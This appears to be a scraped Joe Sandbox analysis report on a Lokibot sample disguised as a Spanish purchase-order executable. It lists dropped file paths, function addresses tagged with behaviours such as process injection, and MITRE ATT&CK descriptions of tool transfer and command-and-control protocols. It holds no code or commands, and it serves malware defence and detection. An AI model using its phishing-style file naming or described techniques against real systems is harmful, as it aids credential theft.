Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rPedidodecompra__PO20441__ARIMComponentes.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPedidodecompra__PO20441__ARIMComponentes.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
rPedidodecompraPO20441ARIMComponentes.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPedidodecompraPO20441ARIMComponentes.exe.log

Analysis Process: rPedidodecompraPO20441ARIMComponentes.exePID: 2584, Parent PID: 1028

Analysis Process: rPedidodecompraPO20441ARIMComponentes.exePID: 2584, Parent PID: 1028COMMON

Function 014DE498 Relevance: 3.9, Strings: 3, Instructions: 121
COMMON

Function 02F20006 Relevance: 1.8, APIs: 1, Instructions: 259
processCOMMON

Function 02F20040 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Function 02F206A0 Relevance: 1.6, APIs: 1, Instructions: 112
injectionCOMMON

Function 02F206A8 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Function 02F20481 Relevance: 1.6, APIs: 1, Instructions: 104
COMMON

Function 02F20598 Relevance: 1.6, APIs: 1, Instructions: 100
memoryCOMMON

Function 02F20488 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 02F205A0 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Function 02F20370 Relevance: 1.6, APIs: 1, Instructions: 89
threadCOMMON

Function 02F20378 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Function 02F207E0 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Function 02F207E8 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 014DCF48 Relevance: 1.3, Strings: 1, Instructions: 51
COMMON

Function 014D4945 Relevance: 1.3, Strings: 1, Instructions: 36
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre